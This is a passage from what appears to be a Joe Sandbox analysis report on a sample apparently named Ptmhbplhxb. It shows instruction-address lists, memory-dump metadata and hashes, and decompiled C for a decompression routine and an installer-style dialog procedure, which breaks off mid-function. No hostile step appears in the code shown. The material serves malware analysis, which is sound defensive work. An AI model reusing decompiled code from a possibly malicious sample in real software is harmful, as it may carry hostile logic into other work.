                0x00406c90
                0x00406c96
                0x00406c98
                0x00000000
                0x00000000
                0x00406cfe
                0x00406cfe
                0x00406d03
                0x00406d05
                0x00406d06
                0x00406d07
                0x00406d08
                0x00406d0e
                0x00406d11
                0x00406d14
                0x00406d17
                0x00406d19
                0x00406d1f
                0x00406d1f
                0x00406d22
                0x00406d22
                0x00406d22
                0x00406d22
                0x00406d2b
                0x00000000
                0x00000000
                0x00406d30
                0x00406d30
                0x00406d33
                0x00406d36
                0x00406d38
                0x00406dcf
                0x00406dcf
                0x00406dd2
                0x00406dd4
                0x00406dd5
                0x00406dd6
                0x00406dd9
                0x00000000
                0x00406dd9
                0x00406d3e
                0x00406d3e
                0x00406d44
                0x00406d46
                0x00406d6b
                0x00406d6e
                0x00406d74
                0x00406d79
                0x00406d7f
                0x00406d85
                0x00406d87
                0x00406d8a
                0x00406d93
                0x00406d99
                0x00406d99
                0x00406d8c
                0x00406d8e
                0x00406d90
                0x00406d90
                0x00406d9b
                0x00406da1
                0x00406da3
                0x00406da6
                0x00406da8
                0x00406dae
                0x00406db0
                0x00406db2
                0x00406db4
                0x00406db6
                0x00406db9
                0x00406dc2
                0x00406dc5
                0x00406dc5
                0x00406dbb
                0x00406dbb
                0x00406dbe
                0x00406dbe
                0x00406db9
                0x00406db0
                0x00406dc7
                0x00406dc9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406dc9
                0x00406d48
                0x00406d48
                0x00406d4e
                0x00406d54
                0x00406d56
                0x00000000
                0x00000000
                0x00406d58
                0x00406d58
                0x00406d5a
                0x00406d5c
                0x00406d63
                0x00406d63
                0x00406d65
                0x00406d5e
                0x00406d5e
                0x00406d60
                0x00406d60
                0x00406d67
                0x00406d69
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406de1
                0x00406de1
                0x00406de4
                0x00406de6
                0x00406de9
                0x00406dec
                0x00406dec
                0x00406dec
                0x00406dec
                0x00000000
                0x00000000
                0x00000000
                0x0040649a
                0x0040647e
                0x00000000
                0x00406484
                0x00406487
                0x00406491
                0x00406494
                0x00406497
                0x00000000
                0x00406497
                0x0040647e
                0x004064a2
                0x004064a5
                0x004064a9
                0x004064b3
                0x004064bd
                0x004064c0
                0x004064c6
                0x004065fa
                0x004065fc
                0x00406602
                0x00406605
                0x00406608
                0x00000000
                0x00406608
                0x004064cc
                0x004064cc
                0x004064cd
                0x00406525
                0x00406525
                0x0040652c
                0x004065d2
                0x004065d2
                0x004065d7
                0x004065da
                0x004065df
                0x004065e2
                0x004065e7
                0x004065ea
                0x004065ef
                0x004065f2
                0x004065f2
                0x00000000
                0x00406532
                0x00406532
                0x00406532
                0x00406532
                0x00406536
                0x00406536
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406565
                0x0040653b
                0x0040653b
                0x00406540
                0x00406542
                0x00406544
                0x00406549
                0x0040654f
                0x00406554
                0x00406556
                0x00406556
                0x0040654b
                0x0040654b
                0x0040654b
                0x00406549
                0x00000000
                0x00406567
                0x00406594
                0x00406599
                0x0040659b
                0x0040659c
                0x0040659e
                0x0040659f
                0x0040659f
                0x0040659f
                0x004065c7
                0x004065cc
                0x004065cc
                0x00000000
                0x004065cc
                0x00406565
                0x0040652c
                0x004064cf
                0x004064cf
                0x004064d0
                0x0040651a
                0x00000000
                0x0040651a
                0x004064d2
                0x004064d3
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040662f
                0x0040662f
                0x0040662f
                0x00406632
                0x00000000
                0x00000000
                0x0040660f
                0x0040660f
                0x00406613
                0x00000000
                0x00000000
                0x00406619
                0x00406619
                0x0040661c
                0x0040661f
                0x00406624
                0x00406626
                0x00406629
                0x0040662c
                0x0040662c
                0x0040662c
                0x00406634
                0x00406634
                0x00406637
                0x00406639
                0x0040663e
                0x00406641
                0x00406643
                0x00406646
                0x00000000
                0x00000000
                0x0040664c
                0x0040664c
                0x0040664e
                0x00000000
                0x00000000
                0x00406654
                0x00406654
                0x00406658
                0x00000000
                0x00000000
                0x0040665e
                0x0040665e
                0x00406661
                0x00406663
                0x00406701
                0x00406701
                0x00406704
                0x00406706
                0x00406706
                0x00406709
                0x0040670c
                0x0040670e
                0x00406710
                0x00406712
                0x00406712
                0x0040671b
                0x00406720
                0x00406723
                0x00406726
                0x00406729
                0x0040672c
                0x0040672c
                0x0040672c
                0x0040672f
                0x00406735
                0x00406735
                0x0040673b
                0x0040673b
                0x0040673b
                0x00000000
                0x0040672f
                0x00406669
                0x00406669
                0x0040666f
                0x00406672
                0x00406674
                0x0040669f
                0x004066a2
                0x004066a8
                0x004066ad
                0x004066b3
                0x004066b9
                0x004066bb
                0x004066be
                0x004066c7
                0x004066cd
                0x004066cd
                0x004066c0
                0x004066c2
                0x004066c4
                0x004066c4
                0x004066cf
                0x004066d5
                0x004066d8
                0x004066da
                0x004066dc
                0x004066e2
                0x004066e4
                0x004066e6
                0x004066e9
                0x004066f2
                0x004066f2
                0x004066f4
                0x004066eb
                0x004066eb
                0x004066ee
                0x004066ee
                0x004066f6
                0x004066f6
                0x004066e4
                0x004066f9
                0x004066fb
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066fb
                0x00406676
                0x00406676
                0x0040667c
                0x00406682
                0x00406684
                0x00000000
                0x00000000
                0x00406686
                0x00406686
                0x00406688
                0x0040668a
                0x0040668d
                0x00406694
                0x00406694
                0x00406696
                0x0040668f
                0x0040668f
                0x00406691
                0x00406691
                0x00406698
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004067a1
                0x004067a4
                0x004067a7
                0x004067ad
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406984
                0x00406984
                0x00406984
                0x00406987
                0x0040698a
                0x0040698c
                0x0040698f
                0x00406995
                0x0040699c
                0x0040699e
                0x00000000
                0x00000000
                0x00406872
                0x00406872
                0x0040689a
                0x0040689a
                0x0040689a
                0x0040689c
                0x00000000
                0x00000000
                0x0040687a
                0x0040687a
                0x0040687e
                0x00000000
                0x00000000
                0x00406884
                0x00406884
                0x00406887
                0x0040688a
                0x0040688d
                0x0040688f
                0x00406891
                0x00406894
                0x00406897
                0x00406897
                0x00406897
                0x0040689e
                0x0040689e
                0x004068a6
                0x004068a9
                0x004068af
                0x004068b2
                0x004068b6
                0x004068ba
                0x004068bd
                0x004068c0
                0x004068d8
                0x004068d8
                0x004068db
                0x004068e9
                0x004068ec
                0x004068dd
                0x004068dd
                0x004068df
                0x004068e6
                0x004068e6
                0x00406915
                0x00406915
                0x00406915
                0x00406918
                0x0040691a
                0x00000000
                0x00000000
                0x004068f5
                0x004068f5
                0x004068f9
                0x00000000
                0x00000000
                0x004068ff
                0x004068ff
                0x00406902
                0x00406905
                0x00406908
                0x0040690a
                0x0040690c
                0x0040690f
                0x00406912
                0x00406912
                0x00406912
                0x0040691c
                0x0040691c
                0x0040691e
                0x00406920
                0x0040692b
                0x0040692e
                0x00406931
                0x00406933
                0x00406935
                0x00406937
                0x0040693a
                0x0040693d
                0x00406942
                0x00406945
                0x00406948
                0x0040694b
                0x00406952
                0x00406955
                0x00406957
                0x00000000
                0x00000000
                0x0040695d
                0x0040695d
                0x00406961
                0x00406972
                0x00406972
                0x00406972
                0x00406974
                0x00406974
                0x00406978
                0x00406978
                0x00406978
                0x0040697a
                0x0040697b
                0x0040697e
                0x0040697e
                0x0040697e
                0x00406981
                0x00000000
                0x00406981
                0x00406963
                0x00406963
                0x00406966
                0x00000000
                0x00000000
                0x0040696c
                0x0040696c
                0x00000000
                0x0040696c
                0x004068c2
                0x004068c2
                0x004068c4
                0x004068c6
                0x004068c9
                0x004068cc
                0x004068d0
                0x004068d0
                0x004069a4
                0x004069a4
                0x004069a7
                0x004069ae
                0x004069b2
                0x004069b4
                0x004069b7
                0x004069ba
                0x004069bf
                0x004069c2
                0x004069c4
                0x004069c5
                0x004069c8
                0x004069d3
                0x004069d6
                0x004069ed
                0x004069f2
                0x004069f9
                0x004069fe
                0x00406a02
                0x00406a04
                0x00406a04
                0x00406a04
                0x00406a07
                0x00406a09
                0x00000000
                0x00406a0f
                0x00406a0f
                0x00406a13
                0x00406a1e
                0x00406a31
                0x00406a36
                0x00406a3b
                0x00406a3d
                0x00000000
                0x00000000
                0x00406a43
                0x00406a43
                0x00406a46
                0x00406a48
                0x00406a56
                0x00406a56
                0x00406a59
                0x00406a59
                0x00406a5c
                0x00406a5f
                0x00406a62
                0x00406a65
                0x00406a68
                0x00406a6b
                0x00000000
                0x00406a6b
                0x00406a4a
                0x00406a4a
                0x00406a50
                0x00000000
                0x00000000
                0x00000000
                0x00406a50
                0x00000000
                0x00000000
                0x00000000
                0x00406def
                0x00406def
                0x00406df5
                0x00406dfb
                0x00406e00
                0x00406e06
                0x00406e0c
                0x00406e0e
                0x00406e11
                0x00406e1a
                0x00406e20
                0x00406e20
                0x00406e13
                0x00406e15
                0x00406e17
                0x00406e17
                0x00406e22
                0x00406e24
                0x00406e27
                0x00406e62
                0x00406e62
                0x00000000
                0x00406e29
                0x00406e29
                0x00406e29
                0x00406e2f
                0x00406e32
                0x00406e34
                0x00406e69
                0x00406e6b
                0x00000000
                0x00406e6b
                0x00000000
                0x00406e34
                0x00000000
                0x00406473
                0x00406e41
                0x00000000
                0x00406e41
                0x00406855
                0x00406857
                0x00000000
                0x00000000
                0x00406859
                0x00406859
                0x0040685c
                0x00000000
                0x0040685c
                0x004067a1
                0x00406762
                0x00406e46
                0x00406e49
                0x00406e4b
                0x00406e54
                0x00406e5a
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                • Instruction ID: 12ef56279526f9f53f22afc89151adbe845766d01d6fb7ada6890335ffbed449
                • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                • Instruction Fuzzy Hash: 5EE19A7190070ADFCB24CF58C980BAABBF1EB45305F15852EE497A72D1E338AA91CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406F19 Relevance: .3, Instructions: 300COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406F19(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d688 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d688;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d688 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                0x00406f24
                0x00406f2c
                0x00406f30
                0x00406f32
                0x00406f35
                0x00406f37
                0x00406f37
                0x00406f39
                0x00406f40
                0x00406f42
                0x00406f42
                0x00406f48
                0x00406f5d
                0x00406f65
                0x00406f67
                0x00406f69
                0x00406f6c
                0x00406f6d
                0x00406f6d
                0x00406f73
                0x00000000
                0x00000000
                0x00406f75
                0x00406f78
                0x00000000
                0x00000000
                0x00000000
                0x00406f78
                0x00406f7c
                0x00406f7f
                0x00406f81
                0x00406f81
                0x00406f84
                0x00406f8a
                0x00406f8b
                0x00000000
                0x00000000
                0x00000000
                0x00406f8b
                0x00406f90
                0x00406f93
                0x00406f95
                0x00406f95
                0x00406f9b
                0x00406f9d
                0x00406fae
                0x00406fa1
                0x00406fa5
                0x0040724a
                0x00000000
                0x0040724a
                0x00406fab
                0x00406fac
                0x00406fac
                0x00406fb4
                0x00406fb7
                0x00406fbb
                0x00406fbd
                0x00406fbf
                0x00406fc2
                0x00000000
                0x00000000
                0x00406fca
                0x00406fd0
                0x00406fd2
                0x00406fd4
                0x00406fd5
                0x00406fea
                0x00406fea
                0x00406fed
                0x00406fef
                0x00406fef
                0x00406ff1
                0x00406ff6
                0x00406ff8
                0x00406fff
                0x00407001
                0x00407009
                0x00407009
                0x0040700b
                0x0040700c
                0x0040701b
                0x0040701f
                0x00407023
                0x00407026
                0x00407029
                0x0040702e
                0x00407031
                0x00407037
                0x0040703e
                0x00407044
                0x0040723d
                0x0040723d
                0x00407242
                0x00407251
                0x00000000
                0x00000000
                0x00000000
                0x00407242
                0x00407051
                0x00407054
                0x00407057
                0x0040705a
                0x0040705e
                0x00000000
                0x00000000
                0x00407069
                0x0040706c
                0x0040706d
                0x0040706f
                0x00407075
                0x00407078
                0x00000000
                0x00000000
                0x0040707e
                0x0040707f
                0x00407082
                0x00407085
                0x00407088
                0x0040708e
                0x00407090
                0x00407090
                0x00407098
                0x0040709c
                0x004070a1
                0x004070c6
                0x004070cc
                0x004070ce
                0x004070d0
                0x004070d3
                0x004070dc
                0x00000000
                0x00000000
                0x004070a3
                0x004070a3
                0x004070ac
                0x004070b0
                0x00000000
                0x00000000
                0x004070c1
                0x004070c1
                0x004070c4
                0x00000000
                0x00000000
                0x004070b4
                0x004070b7
                0x004070b9
                0x004070bd
                0x00000000
                0x00000000
                0x004070bf
                0x004070bf
                0x00000000
                0x004070c1
                0x004070e5
                0x004070eb
                0x004070f5
                0x004070f7
                0x004070fc
                0x004070fe
                0x00407134
                0x00407100
                0x00407100
                0x00407103
                0x00407106
                0x00407110
                0x00407113
                0x0040711a
                0x00407125
                0x0040712c
                0x0040712c
                0x00407136
                0x00407139
                0x0040713b
                0x00407141
                0x00407141
                0x0040714a
                0x0040714d
                0x00407152
                0x00407161
                0x00407169
                0x0040716e
                0x00407192
                0x0040719a
                0x0040719e
                0x004071a4
                0x00407170
                0x0040717e
                0x00407181
                0x00407187
                0x00407187
                0x004071a8
                0x00407163
                0x00407163
                0x00407163
                0x004071b9
                0x004071bd
                0x004071c9
                0x004071c4
                0x004071c7
                0x004071c7
                0x004071d1
                0x004071d6
                0x004071de
                0x004071da
                0x004071dc
                0x004071dc
                0x004071e4
                0x004071e6
                0x004071ed
                0x004071f7
                0x00407201
                0x0040721d
                0x00407221
                0x00407066
                0x0040706c
                0x0040706d
                0x0040706f
                0x00407075
                0x00407078
                0x00000000
                0x00000000
                0x00000000
                0x00407078
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407203
                0x00407203
                0x00407203
                0x00407208
                0x00407211
                0x0040721a
                0x00000000
                0x0040721a
                0x00407227
                0x00407227
                0x0040722a
                0x00407231
                0x00407234
                0x00000000
                0x00407057
                0x00406fd7
                0x00406fd9
                0x00406fd9
                0x00406fdd
                0x00406fe0
                0x00406fe1
                0x00406fe1
                0x00000000
                0x00406fd9
                0x00406f4d
                0x00406f53
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                • Instruction ID: 968ea090ea57439d934916100a42e081e4144f1e312078ddc892fc3721ce49e9
                • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                • Instruction Fuzzy Hash: 18C14A31E0421ACBCF14CF68D4905EEBBB2BF99314F25866AD8567B380D734A942CF95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403B52 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00403B52(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t142;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a858 = _t35;
					if(_t116 == 0x110) {
						 *0x42f408 = _t126;
						 *0x42a86c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429838 = _t92;
						E00404026(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ebe8);
						 *0x42ebcc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a858 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f440;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E00404072(0x40b);
						while(1) {
							_t37 =  *0x42a858;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f444;
							if(_t39 ==  *0x42f444) {
								E0040140B(1);
							}
							__eflags =  *0x42ebcc - _t134; // 0x1
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f444; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00405F87(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E00404026(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E00404026(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E00404026(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ac - _t134;
							_v32 = _t49;
							if( *0x42f4ac != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E00404048(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429838, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ac - _t134;
							if( *0x42f4ac == _t134) {
								_push( *0x42a86c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429838);
							}
							E0040405B();
							E00405F65(0x42a870, E00403B33());
							E00405F87(0x42a870, _t126, _t131,  &(0x42a870[lstrlenA(0x42a870)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a870);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebd8);
									 *0x42a048 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f400,  *_t131 +  *0x42ebe0 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebd8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E00404026(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebd8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebcc - _t134; // 0x1
									if(__eflags != 0) {
